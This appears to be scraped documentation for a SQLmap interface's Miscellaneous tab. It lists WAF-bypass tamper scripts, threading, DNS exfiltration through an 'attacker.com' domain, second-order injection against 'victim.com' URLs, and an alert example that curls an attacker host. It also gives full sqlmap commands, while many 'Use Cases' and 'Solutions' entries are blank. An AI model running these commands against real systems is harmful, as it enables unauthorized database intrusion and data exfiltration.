The Miscellaneous tab contains advanced and specialized SQLmap options that don’t fit into other categories, including tamper scripts, optimization settings, and experimental features.
The Miscellaneous tab contains four main sections:
Parameter: --tamper=TAMPERS
Description: Use tamper scripts to bypass WAF/filtering
Format: Comma-separated list of tamper names
Examples:
--tamper=space2comment
--tamper=apostrophemask,randomcase
--tamper=space2comment,versionedkeywords,space2plus
Use Cases:
/**/
comments--
comments#
comments+
characterssp_password
to bypass MSSQL loggingUNION ALL
with UNION
Parameter: --tamper=/path/to/custom_tamper.py
Description: Use custom tamper script
Requirements: Python script following SQLmap tamper API
Use Cases:
Parameter: --keep-alive
Description: Use persistent HTTP connections
Behavior: Reuses TCP connections for multiple requests
Use Cases:
Parameter: --null-connection
Description: Retrieve page length without actual content
Behavior: Uses HEAD requests to check response sizes
Use Cases:
Parameter: --threads=NUM
Description: Maximum number of concurrent HTTP requests
Default: 1
Range: 1-10
Examples:
--threads=5
--threads=10
Use Cases:
Parameter: --predict-output
Description: Predict common queries output
Behavior: Uses heuristics to predict query results
Use Cases:
Parameter: --skip-heuristics
Description: Skip heuristic detection mechanisms
Behavior: Disables intelligent detection
Use Cases:
Parameter: --skip-urlencode
Description: Skip URL encoding of payload data
Behavior: Sends payloads as-is
Use Cases:
Parameter: --chunked
Description: Use HTTP chunked transfer encoding
Behavior: Sends data in chunks
Use Cases:
Parameter: --force-ssl
Description: Force usage of SSL/HTTPS requests
Behavior: Converts HTTP to HTTPS
Use Cases:
Parameter: --follow-redirects
Description: Follow HTTP redirects
Behavior: Automatically follows 3xx responses
Use Cases:
Parameter: --ignore-proxy
Description: Ignore system default proxy settings
Behavior: Bypasses proxy configuration
Use Cases:
Parameter: --disable-coloring
Description: Disable colored console output
Behavior: Plain text output
Use Cases:
Parameter: --dns-domain=DOMAIN
Description: Use DNS exfiltration technique
Behavior: Exfiltrates data via DNS queries
Examples:
--dns-domain=attacker.com
--dns-domain=test.example.com
Use Cases:
Parameter: --second-order=URL
Description: Detect and exploit second-order SQL injection
Behavior: Tests for delayed injection effects
Examples:
--second-order=http://victim.com/profile.php?id=1
--second-order=http://victim.com/search.php?q=inject
Use Cases:
Parameter: --3rd-level-domain
Description: Use 3rd level domain for DNS exfiltration
Behavior: Creates subdomains for data exfiltration
Use Cases:
Parameter: --alert=ALERT
Description: Run host OS command(s) when SQL injection found
Examples:
--alert="notify-send 'SQLi found'"
--alert="curl http://attacker.com/alert"
--alert="echo 'Vulnerability detected' >> /var/log/alerts.log"
Use Cases:
Parameter: --beep
Description: Beep when SQL injection is found
Behavior: Audio notification on discovery
Use Cases:
Parameter: --cleanup
Description: Clean up SQLmap temporary tables and files
Behavior: Removes injection artifacts
Use Cases:
Parameter: --dependencies
Description: Check for missing dependencies
Behavior: Verifies required libraries and tools
Use Cases:
Tamper Scripts: space2comment,randomcase,apostrophemask
Keep Alive: ✓ Enabled
Threads: 5
Generated Command:
sqlmap -u "http://example.com/page.php?id=1" --tamper=space2comment,randomcase,apostrophemask --keep-alive --threads=5
Null Connection: ✓ Enabled
Predict Output: ✓ Enabled
Concurrent Requests: 8
Skip Heuristics: ✗ Disabled
Generated Command:
sqlmap -u "http://example.com/admin.php?id=1" --null-connection --predict-output --threads=8
Force SSL: ✓ Enabled
Follow Redirects: ✓ Enabled
Chunked Encoding: ✓ Enabled
Generated Command:
sqlmap -u "http://example.com/secure.php?id=1" --force-ssl --follow-redirects --chunked
DNS Domain: attacker.com
3rd Level Domain: ✓ Enabled
Ignore Proxy: ✓ Enabled
Generated Command:
sqlmap -u "http://example.com/restricted.php?id=1" --dns-domain=attacker.com --3rd-level-domain --ignore-proxy
Second Order: http://victim.com/profile.php?id=1
Alert Command: notify-send 'Second-order SQLi found'
Beep: ✓ Enabled
Generated Command:
sqlmap -u "http://example.com/input.php" --second-order=http://victim.com/profile.php?id=1 --alert="notify-send 'Second-order SQLi found'" --beep
Tamper Scripts: space2comment,base64encode
Keep Alive: ✓ Enabled
Null Connection: ✓ Enabled
Threads: 3
Predict Output: ✓ Enabled
Force SSL: ✓ Enabled
Disable Coloring: ✓ Enabled
Generated Command:
sqlmap -u "http://example.com/complex.php?id=1" --tamper=space2comment,base64encode --keep-alive --null-connection --threads=3 --predict-output --force-ssl --disable-coloring
Problem: WAF still blocking despite tamper scripts Solutions:
Problem: Scanning too slow or resource intensive Solutions:
Problem: SSL connection issues Solutions:
Problem: DNS exfiltration failing Solutions:
Problem: Experimental features not working Solutions: